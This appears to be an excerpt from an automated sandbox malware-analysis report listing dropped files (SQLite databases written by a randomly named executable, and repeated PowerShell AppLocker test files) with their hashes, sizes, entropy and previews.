                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5712781801655107
                                                    Encrypted:false
                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
